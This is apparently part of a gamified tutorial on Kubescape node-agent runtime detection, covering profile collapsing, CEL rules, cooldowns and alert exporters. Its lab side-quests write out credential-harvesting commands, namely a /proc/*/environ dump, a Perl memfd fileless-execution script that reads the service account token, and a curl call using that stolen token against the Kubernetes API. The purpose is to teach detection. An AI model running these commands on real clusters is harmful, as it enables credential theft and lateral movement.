  • The name default has special meaning --- storage looks for it first

Default vs Vendor Thresholds

A vendor can pre-declare known-dynamic paths via a recommended CollapseConfiguration (CRD).

Let's assume the vendor ships a Node.js agent that dynamically pulls in thousands of files:

/mnt/.../opt/dtrace/agent/bin/+/any/nodejs/.../augs/AugFactory.js
/mnt/.../opt/dtrace/agent/bin/+/any/nodejs/.../augs/AugManager.js

The vendor may set a threshold of 3 for /mnt/volume/host/opt/dtrace/agent/bin --- this means that if more than 3 unique paths are observed under that prefix, they will be collapsed into /mnt/volume/host/opt/dtrace/agent/bin/*. This allows the vendor to pre-emptively fold known-dynamic paths, reducing noise and improving detection of truly anomalous paths.

| Prefix | Threshold |
|--------|-----------|
| /etc | 100 |
| /opt | 5 |
| /var/run | 3 |
| /app | 1 |
| default | 50 |

The vendor adds a new entry:

| Prefix | Specific Threshold |
|--------|--------------------|
| ... | ... |
| /mnt/volume/host/opt/dtrace/agent/bin | 3 |
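
A sketch of what such a vendor CollapseConfiguration could look like. The apiVersion/kind and the exact field names (entries, prefix, threshold, and the two global thresholds) are assumptions inferred from the validation rules above, not a published schema from the feature/collapse-config-crd branch:

```yaml
# Hypothetical shape — field names follow the validation rules above.
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: CollapseConfiguration
metadata:
  name: default          # "default" has special meaning: storage looks for it first
spec:
  openDynamicThreshold: 50       # must be >= 1
  endpointDynamicThreshold: 50   # must be >= 1
  entries:
    - prefix: /etc                                   # must not be empty
      threshold: 100                                 # must be >= 1
    - prefix: /opt
      threshold: 5
    - prefix: /mnt/volume/host/opt/dtrace/agent/bin  # vendor's known-dynamic path
      threshold: 3
```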

This CRD is signable, too.

Side-Quest --- The proc Harvester

Challenge: From inside your pod, read /proc/*/environ to steal environment variables from every running process:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec -it $REDIS_POD -- sh -c 'cat /proc/*/environ'

Observe: R0008 (severity 5) fires. The collapsed path /proc/β‹―/environ catches every PID in a single profile entry --- the Vault Keeper folded hundreds of /proc/<pid>/environ paths into one wildcard pattern, and R0008 uses exactly that pattern to detect credential harvesting across all processes.
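
The matching behind that single entry can be sketched as follows, assuming β‹― matches exactly one path segment and * matches zero or more (a simplification of the real profile matcher in node-agent/storage):

```go
package main

import (
	"fmt"
	"strings"
)

// matches reports whether a concrete path matches a collapsed profile
// entry: β‹― stands for exactly one segment, * for zero or more.
func matches(pattern, p string) bool {
	return match(strings.Split(pattern, "/"), strings.Split(p, "/"))
}

func match(ps, cs []string) bool {
	if len(ps) == 0 {
		return len(cs) == 0
	}
	switch ps[0] {
	case "*":
		// Zero or more segments: consume nothing, or one segment and retry.
		if match(ps[1:], cs) {
			return true
		}
		return len(cs) > 0 && match(ps, cs[1:])
	case "β‹―":
		return len(cs) > 0 && match(ps[1:], cs[1:])
	default:
		return len(cs) > 0 && ps[0] == cs[0] && match(ps[1:], cs[1:])
	}
}

func main() {
	fmt.Println(matches("/proc/β‹―/environ", "/proc/11873/environ"))            // true
	fmt.Println(matches("/proc/β‹―/environ", "/proc/11873/task/11873/environ")) // false: β‹― is one segment
	fmt.Println(matches("/proc/*/environ", "/proc/11873/task/11873/environ")) // true: * spans segments
}
```

Note how the second alert below (the /proc/<pid>/task/<tid>/environ variant) would need either a * entry or its own collapsed pattern, because β‹― never spans more than one segment.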

kubectl logs -n kubescape -l app=node-agent -c node-agent -f | grep R0008

{"BaseRuntimeMetadata":{"alertName":"Read Environment Variables from procfs","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Reading environment variables from procfs: /proc/11873/environ by process cat","path":"/proc/11873/environ"},"infectedPID":271417,"severity":5,"timestamp":"2026-03-17T18:17:54.539234494Z","trace":{},"uniqueID":"ee849f132c7b8234cccbca8f1ee51d54","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"environ","directory":"/proc/11873"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0008","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":271411,"cmdline":"/usr/bin/sh -c cat /proc/*/environ","comm":"sh","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"cat␟271417":{"pid":271417,"cmdline":"/usr/bin/cat /proc/1/environ /proc/11867/environ /proc/self/environ /proc/thread-self/environ","comm":"cat","ppid":271411,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"}}},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Reading environment variables from procfs: /proc/11873/environ by process 
cat","msg":"Read Environment Variables from procfs","processtree_depth":"2","time":"2026-03-17T18:17:54Z"}
{"BaseRuntimeMetadata":{"alertName":"Read Environment Variables from procfs","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Reading environment variables from procfs: /proc/11873/task/11873/environ by process cat","path":"/proc/11873/task/11873/environ"},"infectedPID":271417,"severity":5,"timestamp":"2026-03-17T18:17:54.539418718Z","trace":{},"uniqueID":"82bfe1834be459a931ba5b01d3cbe1da","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"environ","directory":"/proc/11873/task/11873"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0008","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":271411,"cmdline":"/usr/bin/sh -c cat /proc/*/environ","comm":"sh","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"cat␟271417":{"pid":271417,"cmdline":"/usr/bin/cat /proc/1/environ /proc/11867/environ /proc/self/environ /proc/thread-self/environ","comm":"cat","ppid":271411,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"}}},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Reading environment variables from procfs: 
/proc/11873/task/11873/environ by process cat","msg":"Read Environment Variables from procfs","processtree_depth":"2","time":"2026-03-17T18:17:54Z"}

The Vault Keeper's work is done. The profile is collapsed, persisted, and ready. Any future event will be compared against this canonical scroll. The question is: who does the comparing?

Room 8 -- The Inquisitor's Court


A hooded figure sits on an obsidian throne, flanked by floating tablets inscribed with glowing runes. Each tablet is a CEL expression. When an event arrives, the Inquisitor evaluates every rule. If the answer is "alert" --- the bell tolls.

The Inquisitor's Court
  EnrichedEvent                                          RuleManager.ReportEnrichedEvent()
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                 β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ exepath:    "/proc/self/fd/3"      β”‚                 β”‚  1. ListRulesForPod(ns, pod)                            β”‚
  β”‚ comm:       "3"                    β”‚ ──────────────> β”‚  2. Filter by eventType == "exec"                       β”‚
  β”‚ args:       ["cat", ".../token"]   β”‚                 β”‚  3. For each rule:                                      β”‚
  β”‚ pcomm:      "perl"                 β”‚                 β”‚       celEvaluator.EvaluateRule(                        β”‚
  β”‚ processTree: { pid: 25489,         β”‚                 β”‚         enrichedEvent, rule.Expressions.RuleExpression) β”‚
  β”‚   ppid: 9806, uid: 999 (redis) }   β”‚                 β”‚  4. If shouldAlert β†’ create RuleFailure                 β”‚
  β”‚ k8s: ns=redis, pod=redis-b477..    β”‚                 β”‚  5. exporter.SendRuleAlert(failure)                     β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ 

The RuleManager receives the enriched event and evaluates every bound rule. For exec events, the critical rule is R1005.

R1005 --- The Fileless Execution Spell

Defined in default-rules.yaml:

- name: "Fileless execution detected"
  id: "R1005"
  severity: 8
  expressions:
    ruleExpression:
      - eventType: "exec"
        expression: >-
          event.exepath.contains('memfd')
          || event.exepath.startsWith('/proc/self/fd')
          || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+')
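
The expression is ordinary CEL, but the predicate is easy to restate in plain Go if you want to test inputs against it. This is a stand-in for the CEL engine, not node-agent code; CEL's matches() is an unanchored RE2 match, mirrored here by regexp.MatchString:

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// procFdRe mirrors the third clause of the R1005 expression.
var procFdRe = regexp.MustCompile(`/proc/[0-9]+/fd/[0-9]+`)

// isFilelessExec restates the R1005 CEL expression in Go.
func isFilelessExec(exepath string) bool {
	return strings.Contains(exepath, "memfd") ||
		strings.HasPrefix(exepath, "/proc/self/fd") ||
		procFdRe.MatchString(exepath)
}

func main() {
	for _, p := range []string{"/proc/self/fd/3", "memfd:pwned", "/usr/bin/cat"} {
		fmt.Printf("%-18s -> %v\n", p, isFilelessExec(p)) // true, true, false
	}
}
```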

At this point, let's explain that there are three types of rules. You can toggle their profile dependency in default-rules.yaml. Be cautious about flooding your system with alerts. It is also possible to bind rules to specific workloads via RuleBindings, which helps fine-tune detections.

Rule Types

The EventType

A key element of any rule is the gadget it depends on. In this case, the gadget is the exec event type. The Inquisitor evaluates the CEL expression only for events of that type.

The CEL engine maps event.exepath through three layers:

  CEL expression: event.exepath
       β”‚
       β–Ό
  cel.go: CelFields["exepath"].GetFrom
       β”‚  calls x.Raw.GetExePath()
       β–Ό
  datasource_event.go: GetExePath()
       β”‚  calls getFieldAccessor("exepath").String(e.Data)
       β–Ό
  eBPF datasource field "exepath"
       β”‚  the kernel-reported exec path
       β–Ό
  "/proc/self/fd/3"  or  "memfd:pwned"
Source code -- CEL field mapping for exepath

pkg/utils/cel.go:191-201

"exepath": {
    Type:  celtypes.StringType,
    GetFrom: ref.FieldGetter(func(target any) (any, error) {
        x := target.(*xcel.Object[CelEvent])
        return x.Raw.GetExePath(), nil
    }),
},

GetExePath() in datasource_event.go:380:

func (e *DatasourceEvent) GetExePath() string {
    exepath, _ := e.getFieldAccessor("exepath").String(e.Data)
    return exepath
}
Source code -- RuleManager.ReportEnrichedEvent evaluates all rules

pkg/rulemanager/rule_manager.go:134-256

func (rm *RuleManager) ReportEnrichedEvent(enrichedEvent *events.EnrichedEvent) {
    // 1. Look up rules for this pod
    rules = rm.ruleBindingCache.ListRulesForPod(namespace, pod)

    for _, rule := range rules {
        // 2. Filter by event type
        ruleExpressions := rm.getRuleExpressions(rule, eventType)

        // 3. Evaluate CEL
        shouldAlert, _ := rm.celEvaluator.EvaluateRule(
            enrichedEvent, rule.Expressions.RuleExpression)

        if shouldAlert {
            // 4. Cooldown check β€” suppress duplicates
            uniqueID, _ := getUniqueIdAndMessage(...)
            if shouldCooldown, _ := rm.ruleCooldown.ShouldCooldown(
                uniqueID, containerID, rule.ID); shouldCooldown {
                continue // ← identical alert already fired, skip
            }
            // 5. Create alert + send
            ruleFailure := rm.ruleFailureCreator.CreateRuleFailure(...)
            rm.exporter.SendRuleAlert(ruleFailure)
        }
    }
}
Source code -- CEL.EvaluateRule compiles and runs the expression

pkg/rulemanager/cel/cel.go:178-207

func (c *CEL) EvaluateRule(event *events.EnrichedEvent,
    expressions []typesv1.RuleExpression) (bool, error) {

    evalContext := c.createEvalContext(event) // maps "event" β†’ xcel object

    for _, expression := range expressions {
        out, _ := c.evaluateProgramWithContext(expression.Expression, evalContext)
        boolVal := out.Value().(bool)
        if !boolVal {
            return false, nil // all expressions must be true
        }
    }
    return true, nil
}

The compiled program is cached in programCache after first use.

The Alert Payload

When R1005 fires, the ExecAdapter enriches the RuleFailure with exec-specific metadata:

  RuleFailure {
    RuleID:    "R1005"
    AlertName: "Fileless execution detected"
    Severity:  8
    Message:   "Fileless execution detected: exec call \"3\" is from a malicious source"
    Arguments: {
        "args": [
                "/proc/self/fd/3",
                "/var/run/secrets/kubernetes.io/serviceaccount/token"
            ],
        "exec": "/proc/self/fd/3",
    }
    ProcessTree: {
      "pid": 25489,
      "comm": "3",
      "ppid": 9806,
      "pcomm": "containerd-shim",
      "uid": 999, (redis)
      "gid": 999, (redis)
      "cmdline": "/proc/self/fd/3 /var/run/secrets/.../token"
    }
    K8sDetails: {
      namespace: "redis", podName: "redis-b477756-74n4r"
      containerName: "redis", image: "ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10"
    }
    MitreTactic:    "TA0005"  (Defense Evasion)
    MitreTechnique: "T1055"   (Process Injection)
  }
Source code -- ExecAdapter sets alert metadata

pkg/rulemanager/ruleadapters/adapters/exec.go:22-80

func (c *ExecAdapter) SetFailureMetadata(failure types.RuleFailure,
    enrichedEvent *events.EnrichedEvent, _ map[string]any) {

    execPath := utils.GetExecPathFromEvent(execEvent)
    baseRuntimeAlert.InfectedPID = execEvent.GetPID()
    baseRuntimeAlert.Arguments["exec"] = execPath
    baseRuntimeAlert.Arguments["args"] = execEvent.GetArgs()

    runtimeProcessDetails := apitypes.ProcessTree{
        ProcessTree: apitypes.Process{
            Comm:     execEvent.GetComm(),
            Hardlink: execEvent.GetExePath(), // "memfd:pwned"
            Path:     execFullPath,
            Cmdline:  fmt.Sprintf("%s %s", execPath, strings.Join(args, " ")),
        },
    }
}

The Cooldown Ward --- Why the Bell Only Tolls Once

Between step 4 (CEL says "alert") and step 5 (send), there is a gate: the RuleCooldown. It prevents the same alert from flooding the logs.

  CEL: shouldAlert = true
       β”‚
       β–Ό
  getUniqueIdAndMessage()
       β”‚  hashes rule metadata (exepath, args, comm)
       β”‚  into a uniqueID string
       β–Ό
  RuleCooldown.ShouldCooldown(uniqueID, containerID, ruleID)
       β”‚
       β”œβ”€β”€ count = cooldownMap[key]++
       β”‚
       β”œβ”€β”€ count ≀ CooldownAfterCount? β†’ alert fires βœ“
       β”‚
       └── count > CooldownAfterCount? β†’ suppressed (continue) βœ—
                                          β”‚
                                          └── until cache entry expires
                                              (CooldownDuration later)
| Config | Default | Effect |
|--------|---------|--------|
| ruleCooldownAfterCount | 1 | Fire once, then suppress |
| ruleCooldownDuration | 1h | Cache TTL --- the suppression window |
Source code -- RuleCooldown.ShouldCooldown

pkg/rulemanager/rulecooldown/rulecooldown.go:35-50

func (rc *RuleCooldown) ShouldCooldown(uniqueID string,
    containerID string, ruleID string) (bool, int) {

    key := uniqueID + containerID + ruleID

    count, _ := rc.cooldownMap.Get(key)
    count++
    rc.cooldownMap.Add(key, count)

    return count > rc.cooldownConfig.CooldownAfterCount, count
}

Default config from pkg/config/config.go:166-169:

viper.SetDefault("ruleCooldown::ruleCooldownAfterCount", 1)
viper.SetDefault("ruleCooldown::ruleCooldownDuration", 1*time.Hour)

Helm override (set in Room 1):

--set nodeAgent.config.ruleCooldown.ruleCooldownAfterCount=999999

The Network Sentinels --- NN-Based Rules

Two rules guard the network boundary by evaluating traffic against the NetworkNeighborhood (NN) --- the network equivalent of the ApplicationProfile.

Where the ApplicationProfile records what processes run, which endpoints/methods are called and what files are opened, the NN records what domains are resolved and what IPs are contacted. The Inquisitor exposes NN checks as CEL helper functions in the nn.* library:

  DNS event                               Network event
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ event.name:        β”‚                   β”‚ event.dstAddr: 8.8.4.4 β”‚
  β”‚   "google.com."    β”‚                   β”‚ event.dstPort: 80      β”‚
  β”‚ event.containerId  β”‚                   β”‚ event.pktType: OUTGOINGβ”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
           β”‚                                        β”‚
           β–Ό                                        β–Ό
  nn.is_domain_in_egress(                  nn.was_address_in_egress(
    event.containerId,                       event.containerId,
    event.name)                              event.dstAddr)
           β”‚                                        β”‚
           β–Ό                                        β–Ό
  Scans NN egress[].dnsNames              Scans NN egress[].ipAddress
  for "google.com."                       for "8.8.4.4"
           β”‚                                        β”‚
       NOT FOUND β†’ R0005 fires                  NOT FOUND β†’ R0011 fires

R0005 --- DNS Anomalies in Container

- name: "DNS Anomalies in container"
  id: "R0005"
  severity: 1
  expressions:
    ruleExpression:
      - eventType: "dns"
        expression: >-
          !event.name.endsWith('.svc.cluster.local.')
          && !nn.is_domain_in_egress(event.containerId, event.name)

R0011 --- Unexpected Egress Network Traffic

- name: "Unexpected Egress Network Traffic"
  id: "R0011"
  severity: 5
  expressions:
    ruleExpression:
      - eventType: "network"
        expression: >-
          event.pktType == 'OUTGOING'
          && !net.is_private_ip(event.dstAddr)
          && !nn.was_address_in_egress(event.containerId, event.dstAddr)

Taken together, these two network rules can protect against MITM attacks, data exfiltration, command-and-control callbacks, and other malicious network activity. In the age of AI, it is advisable to verify every external endpoint you send sensitive data to, especially telemetry endpoints.

Source code -- nn.wasAddressInEgress iterates egress entries

pkg/rulemanager/cel/libraries/networkneighborhood/network.go:13-39

func (l *nnLibrary) wasAddressInEgress(containerID, address ref.Val) ref.Val {
    container, err := profilehelper.GetContainerNetworkNeighborhood(
        l.objectCache, containerIDStr)
    if err != nil {
        return cache.NewProfileNotAvailableErr(...)
    }

    for _, egress := range container.Egress {
        if egress.IPAddress == addressStr {
            return types.Bool(true) // IP is allowlisted
        }
    }
    return types.Bool(false) // IP NOT in NN β†’ alert fires
}

nn.is_domain_in_egress works the same way but checks egress[].DNSNames and the deprecated egress[].DNS field:

func (l *nnLibrary) isDomainInEgress(containerID, domain ref.Val) ref.Val {
    container, err := profilehelper.GetContainerNetworkNeighborhood(
        l.objectCache, containerIDStr)
    if err != nil {
        return cache.NewProfileNotAvailableErr(...)
    }

    for _, egress := range container.Egress {
        if slices.Contains(egress.DNSNames, domainStr) || egress.DNS == domainStr {
            return types.Bool(true)
        }
    }
    return types.Bool(false)
}

The Inquisitor is kept busy; tune your profiles and rules so as not to overwork them. They are government employees, you know...


Room 9 -- Herald's Tower & Quest Complete

Room 9: The Herald's Tower

At the top of the tallest tower, heralds stand at the battlements. When the bell tolls, a scroll flies up through a shaft. The first herald posts carriage returns πŸ“œ to stdout. The second practices proper o11y πŸ¦‰ and reports to AlertManager. The third dispatches a carrier pigeon πŸ•ŠοΈ as messenger via HTTP. The syslog herald accepts only cuneiform πŸ—Ώ. Within milliseconds, the defenders know.

  RuleManager                                         Exporters
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚                             β”‚                     β”‚                                          β”‚
  β”‚  exporter.SendRuleAlert(    β”‚                     β”‚  πŸ“œ stdout    ──>  kubectl logs          β”‚
  β”‚    ruleFailure              β”‚ ──────────────────> β”‚  πŸ¦‰ alertmgr  ──>  POST /api/v2/alerts   β”‚
  β”‚  )                          β”‚                     β”‚  πŸ•ŠοΈ http      ──>  webhook endpoint      β”‚
  β”‚                             β”‚                     β”‚  πŸ—Ώ syslog    ──>  syslog server         β”‚
  β”‚                             β”‚                     β”‚                                          β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The Exporter ships the RuleFailure to one or more destinations. Stdout is the default (enabled via nodeAgent.stdoutExporter=true in Helm).


Reading the Alert

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=50 | grep "R1005" | head -1 | python3 -m json.tool

Every alert answers six questions:

| Question | Field | Our R1005 Value |
|----------|-------|-----------------|
| What happened? | msg | Fileless execution detected |
| Who did it? | cmdline/path | "/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token" (memfd:pwned) |
| Where? | RuntimeK8sDetails | redis container, redis namespace |
| When? | timestamp | nanosecond precision |
| Why suspicious? | message | exec call 3 is from a malicious source |
| How bad? | severity | 8 (MITRE T1055) |

The Complete Journey

Fellowship Image

Event Trace: execve("/proc/self/fd/3")

| # | Component | Source File | What Happens |
|---|-----------|-------------|--------------|
| 1 | Kernel | - | execve("/proc/self/fd/3") syscall |
| 2 | eBPF probe | trace_exec gadget | Captures exepath, pid, comm, args, timestamp |
| 3 | ExecOperator | tracers/execoperator.go | Parses null-terminated arg buffer |
| 4 | eventOperator | tracers/exec.go:109 | Wraps in DatasourceEvent, callback filter |
| 5 | OrderedEventQueue | ordered_event_queue.go | Min-heap insert, 50ms drain |
| 6 | EventEnricher | event_enricher.go:28 | Process tree: redis-server β†’ perl β†’ cat(3) |
| 7 | WorkerPool | container_watcher.go:159 | Fan-out to handlers |
| 8 | ProfileManager | event_handler_factory.go:224 | Records exec (if still learning) |
| 9 | RuleManager | rule_manager.go:216 | CEL evaluates R1005 expression |
| 10 | CEL Engine | rulemanager/cel/cel.go:178 | event.exepath.contains('memfd') β†’ true |
| 11 | ExecAdapter | ruleadapters/adapters/exec.go | Sets PID, args, process tree on alert |
| 12 | Exporter | rule_manager.go:252 | SendRuleAlert() β†’ stdout / alertmgr |

Four Rules That Fire

Our fileless exec triggers four different rules:

| Rule | Severity | CEL Expression | Why It Fires |
| --- | --- | --- | --- |
| R1005 | 8 | event.exepath.contains('memfd') \|\| ... | exepath = /proc/self/fd/3 |
| R0001 | 1 | !ap.was_executed(containerID, path) | perl not in exec profile |
| R0003 | 1 | syscall anomaly | memfd_create not in syscall profile |
| R0006 | 1 | event.path.startsWith('/run/secrets/.../serviceaccount') && ...endsWith('/token') | cat reads the mounted serviceaccount token |
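The R1005 check boils down to a substring test on the resolved exec path. In node-agent this is a compiled CEL expression (rulemanager/cel/cel.go); the plain-Go version below only mirrors its semantics, and the elided "||Β ..." branches of the real rule are intentionally left out:

```go
package main

import (
	"fmt"
	"strings"
)

// execEvent holds the one field the R1005 expression touches (illustrative subset).
type execEvent struct {
	exepath string
}

// r1005 approximates `event.exepath.contains('memfd')` from the rule table:
// an exe path backed by an anonymous in-memory file means fileless execution.
// (The real rule has further '|| ...' branches, omitted here.)
func r1005(e execEvent) bool {
	return strings.Contains(e.exepath, "memfd")
}

func main() {
	// the kernel resolves /proc/self/fd/3 to the memfd:pwned backing file
	e := execEvent{exepath: "memfd:pwned"}
	fmt.Println(r1005(e)) // true: our in-memory cat trips the rule
}
```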
Repo Map

Mini-Quest: The Stolen Token

The Golem's accomplice, a rogue script kiddie, has stolen a service account token. They attempt to use it for lateral movement, but the R0006 herald is waiting. The alert goes out, yet alas, the K8s API has already been invoked (R0007). The damage is done, but at least the defenders know how it happened and can respond accordingly.

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
# memfd_create: syscall 279 on arm64, 319 on x86_64
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
# copy /bin/cat into the anonymous in-memory file
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
# execute the in-memory binary: fileless execution via /proc/self/fd
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

TOKEN=...

{"BaseRuntimeMetadata":{"alertName":"Unexpected service account token access","arguments":{"apChecksum":"4a47f71249d3fa76d990667495a566db2a7d72beb23949b764006c31d8c6a27a","flags":["O_RDONLY"],"message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token with flags: O_RDONLY","path":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token"},"infectedPID":816383,"severity":5,"timestamp":"2026-03-17T22:04:32.706127342Z","trace":{},"uniqueID":"d077f244def8a70e5ea758bd8352fcd8","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"cat"},"file":{"name":"token","directory":"/run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089"}},"agentVersion":"test-4bcd364"},"CloudMetadata":null,"RuleID":"R0006","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:69cdf2a6eda0be0a2238d20c03922f7fbf18e7274e49eda614fb41970ac6bff0","namespace":"redis","containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83","podName":"redis-54f999cb48-sfb5h","podNamespace":"redis","podUID":"64fea88a-44b4-4d12-b548-19397de5a7eb","workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"ff8ecf3a-2dc2-40ee-8234-06ac4aae6aa7"},"RuntimeProcessDetails":{"processTree":{"pid":816383,"cmdline":"/usr/bin/cat /var/run/secrets/kubernetes.io/serviceaccount/token","comm":"cat","ppid":12965,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/cat"},"containerID":"f35adaf4262d3672d8152a035bbf9f426564812d926ab24dff2468e139d21f83"},"level":"error","message":"Unexpected access to service account token: /run/secrets/kubernetes.io/serviceaccount/..2026_03_17_21_20_33.1657460089/token with flags: O_RDONLY","msg":"Unexpected service account token access","processtree_depth":"1","time":"2026-03-17T22:04:32Z"}
#export TOKEN=....
kubectl run curler -n redis --image=curlimages/curl --restart=Never  -- sleep 3600
kubectl -n redis exec -it curler -- sh -c \
  'TOKEN="put the value in quotes"; \
    curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/redis/pods | head -20'

Now that you have learnt how the rules work: what needs to be true for the R0007 alert to fire?


Hero, this ends your quest 🐼 πŸ‘‹πŸ»

Find the official Documentation at kubescape.io

There are community meetings on Zoom every second Tuesday at 15:00 CET, and a Slack channel.

This is open-source software, and this tutorial is licensed under the Apache 2.0 License, without liability or warranty of any kind, express or implied. Use at your own risk. For educational purposes only.

For more quests, star our repos and follow us on LinkedIn, GitHub and Twitter. We are always looking for brave adventurers to join our quest to secure the Kubernetes realm. If you have any questions or feedback, please reach out to us on GitHub or social media. Happy hunting!